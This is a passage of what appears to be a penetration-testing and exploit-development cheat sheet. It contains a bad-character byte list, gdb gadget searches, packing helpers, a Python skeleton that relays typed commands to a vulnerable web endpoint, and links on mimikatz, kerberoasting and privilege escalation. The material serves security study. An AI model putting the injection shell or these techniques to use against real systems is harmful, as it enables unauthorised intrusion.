characters\n```python\n# all 256 byte values; remove the ones the target mangles to get the real bad-character list\nbadchars = b'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff'\n```\n\n# gdb\n## list memory of process\n- `info files`\n\n## find \"jmp esp\" with gdb\n- `find /b <from addr>, <to addr>, 0xff, 0xe4`\n\n## list shared modules\n- `info sharedlibrary`\n\n## serve binary via network\n- `socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:\"stdbuf -i0 -o0 -e0 ./binary\"`\n\n\n# helper functions\n```python\nimport struct\n\n# pack an integer as little-endian 64-bit / 32-bit\ndef p64(x):\n    return struct.pack(\"<Q\", x)\n\ndef p32(x):\n    return struct.pack(\"<L\", x)\n```\n\n# command shell skeleton\n```python\n#!/usr/bin/python3\nimport requests\nfrom cmd import Cmd\n\nclass Terminal(Cmd):\n  prompt = '> '\n\n  def default(self, args):\n    RunCmd(args)\n\ndef RunCmd(cmd):\n  data = {'property' : f'string 
{cmd}'}\n  # 'http://' is a placeholder: put the vulnerable endpoint here\n  req = requests.post('http://', data=data)\n\nif __name__ == '__main__':\n  Terminal().cmdloop()\n```\n\n# interactive shells\n## cat technique\n- `(cat exploit.txt; cat) | ./vulnapp`\n\n---\n\n## external resources\n\n### cheatsheets\n[Cheatsheet-God](https://github.com/OlivierLaflamme/Cheatsheet-God)  \n\n### compiling exploits\n[https://medium.com](https://medium.com/@_____________/compiling-exploits-4ec7bb9ec03c)  \n\n### pivoting\n[https://www.ivoidwarranties.tech - (proxychains)](https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/proxychains)  \n[https://posts.specterops.io - (ssh tunnels guide)](https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6)  \n\n### mimikatz\n[mimikatz](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa)  \n\n### upgrade shell to meterpreter and bypass applocker\n[https://mlcsec.com](https://mlcsec.com/shell-upgrade-cheat-sheet/#msbuildexe)  \n\n### powershell\n[https://burmat.gitbook.io](https://burmat.gitbook.io/security/hacking/one-liners-and-dirty-scripts)  \n\n### SQLi\n[http://securityidiots.com](http://securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html)  \n\n### LFI / RFI\n[https://websec.wordpress.com](https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/)  \n\n### kerberoasting & as_rep roasting\n[https://en.hackndo.com](https://en.hackndo.com/kerberoasting/)  \n[https://luemmelsec.github.io](https://luemmelsec.github.io/Kerberoasting-VS-AS-REP-Roasting/)  \n\n### kerberos\n[https://www.roguelynn.com](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)  \n\n### oscp\n[https://github.com/xMilkPowderx](https://github.com/xMilkPowderx/OSCP)  \n[Awesome-oscp](https://github.com/0x4D31/awesome-oscp)  \n\n### linux privilege escalation\n[https://blog.g0tmi1k.com](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)  
\n[hacktricks-capabilities](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)  \n[https://gtfobins.github.io](https://gtfobins.github.io/)  \n\n### windows privilege escalation\n[https://github.com/frizb](https://github.com/frizb/Windows-Privilege-Escalation)  \n[https://github.com/xapax](https://github.com/xapax/security/blob/master/privilege_escalation_windows.md)  \n[http://travisaltman.com](http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/)  \n[http://www.fuzzysecurity.com](http://www.fuzzysecurity.com/tutorials/16.html)  \n[https://www.offensive-security.com](https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/)  \n[http://it-ovid.blogspot.cl](http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html)  \n[https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz)  \n[http://bernardodamele.blogspot.cl](http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html)  \n[http://www.harmj0y.net](http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/)  \n[https://github.com/PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)  \n[http://pwnwiki.io](http://pwnwiki.io/#!privesc/windows/index.md)  \n[https://lolbas-project.github.io/#](https://lolbas-project.github.io/)  \n"
  }
]